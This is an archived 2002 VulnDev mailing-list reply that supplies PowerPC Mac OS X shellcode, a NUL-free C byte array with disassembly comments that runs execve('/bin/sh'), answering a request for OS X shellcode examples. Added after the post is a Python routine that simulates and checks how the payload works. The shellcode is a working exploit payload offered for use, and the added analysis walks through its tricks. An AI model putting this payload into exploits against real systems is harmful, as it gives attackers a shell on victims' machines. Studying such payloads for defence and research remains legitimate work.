Here is some shellcode that I wrote a while back. It was written and tested on a G3 running OSX 10.0.x - 10.1.x. IIRC it worked fine on NetBSD also (same syscall number for execve) and fine on Linux with a changed system call number. The assembly language source and header files are available at http://www.dopesquad.net/security.

/* PPC MacOS X (maybe others) shellcode
 *
 * ghandi <ghandiat_private>
 */
char shellcode[] =
    "\x7c\xa5\x2a\x79"  /* xor.  r5, r5, r5      ; r5 = NULL          */
    "\x40\xa2\xff\xfd"  /* bnel  shellcode                            */
    "\x7f\xe8\x02\xa6"  /* mflr  r31                                  */
    "\x3b\xff\x01\x30"  /* addi  r31, r31, 268+36                     */
    "\x38\x7f\xfe\xf4"  /* addi  r3, r31, -268   ; r3 = path          */
    "\x90\x61\xff\xf8"  /* stw   r3, -8(r1)      ; argv[0] = path     */
    "\x90\xa1\xff\xfc"  /* stw   r5, -4(r1)      ; argv[1] = NULL     */
    "\x38\x81\xff\xf8"  /* subi  r4, r1, 8       ; r4 = {path, 0}     */
    "\x3b\xc0\x76\x01"  /* li    r30, 30209                           */
    "\x7f\xc0\x4e\x70"  /* srawi r0, r30, 9                           */
    "\x44\xff\xff\x02"  /* sc                    ; execve(r3, r4, r5) */
    "/bin/sh";

--
ghandi / ghandiat_private / www.dopesquad.net
"Bein' Crazy is the least of my worries." - Jack Kerouac
C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F

On Thu, 10 Jan 2002, Josha Bronson wrote:

> Greetings VulnDev,
>
> Anyone have some pointers (hah.. punny..) to shellcode examples for OS
> X?
>
> Thanks in advance,
> --
> Josha Bronson
> dmuzat_private
> AngryPacket Security
>
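An analyst's check of the payload above, added here and not part of the original post: it decodes the eleven words (only the instruction forms this shellcode uses), interprets them up to `sc` with the code assumed loaded at address 0 and r1 = 0x1000 (both constructed), and confirms the NUL-free tricks do what the comments claim: the bnel/mflr pair and the 268+36 / -268 split land r3 on the path string, li/srawi yields syscall 59, and the arguments are {path, NULL} with a NULL envp.

```python
import struct

# Constructed from the post: the 11 big-endian PPC words followed by the path string.
SHELLCODE = bytes.fromhex(
    "7ca52a79" "40a2fffd" "7fe802a6" "3bff0130" "387ffef4" "9061fff8"
    "90a1fffc" "3881fff8" "3bc07601" "7fc04e70" "44ffff02") + b"/bin/sh"

def s16(v):
    return v - 0x10000 if v & 0x8000 else v

def decode(w):
    """Decode only the instruction forms this shellcode uses (not a full PPC disassembler)."""
    op, rd, ra, rb = w >> 26, (w >> 21) & 31, (w >> 16) & 31, (w >> 11) & 31
    if op == 14: return ("addi", rd, ra, s16(w & 0xffff))       # addi / li / subi
    if op == 36: return ("stw", rd, ra, s16(w & 0xffff))        # stw rS, d(rA)
    if op == 16: return ("bc", rd, ra, s16(w & 0xfffc), w & 1)  # BO, BI, BD, LK
    if op == 17: return ("sc",)                                 # reserved bits ignored by the CPU
    if op == 31:                                                # X-form: xor., mfspr (mflr), srawi
        return ({316: "xor", 339: "mfspr", 824: "srawi"}[(w >> 1) & 0x3ff], rd, ra, rb, w & 1)
    raise ValueError("unexpected word %#x" % w)

def simulate(code=SHELLCODE, sp=0x1000):
    """Interpret the words up to `sc`; code assumed at address 0, r1 = sp (both constructed)."""
    r = [0] * 32
    r[1], mem, lr, cr0_eq, pc = sp, {}, 0, False, 0
    while True:
        ins, nxt = decode(struct.unpack(">I", code[pc:pc + 4])[0]), pc + 4
        if ins[0] == "xor":                        # xor rA, rS, rB ; Rc=1 updates CR0
            r[ins[2]] = r[ins[1]] ^ r[ins[3]]
            if ins[4]: cr0_eq = r[ins[2]] == 0
        elif ins[0] == "bc":                       # LR is written whenever LK=1, taken or not
            if ins[4]: lr = pc + 4
            assert ins[2] == 2, "only CR0.EQ is modelled"
            if bool(ins[1] & 8) == cr0_eq: nxt = pc + ins[3]
        elif ins[0] == "mfspr": r[ins[1]] = lr     # mflr rD
        elif ins[0] == "addi":  r[ins[1]] = (r[ins[2]] if ins[2] else 0) + ins[3]
        elif ins[0] == "stw":   mem[r[ins[2]] + ins[3]] = r[ins[1]]
        elif ins[0] == "srawi": r[ins[2]] = r[ins[1]] >> ins[3]   # rb slot carries SH
        elif ins[0] == "sc":    return r, mem
        pc = nxt

def encode_addi(rd, ra, imm):
    return struct.pack(">I", (14 << 26) | (rd << 21) | (ra << 16) | (imm & 0xffff))

def analyse(code=SHELLCODE):
    r, mem = simulate(code)
    return {"nul_free": 0 not in code,
            "syscall": r[0],                       # 59 = execve on Darwin and NetBSD
            "path": code[r[3]:],                   # r3 should point just past the 11 words
            "argv0_is_path": mem[r[4]] == r[3], "argv1_null": mem[r[4] + 4] == 0,
            "envp_null": r[5] == 0,
            "direct_offset_has_nul": 0 in encode_addi(3, 31, 36)}  # why 268+36 / -268 was used
```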
This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 17:39:01 PST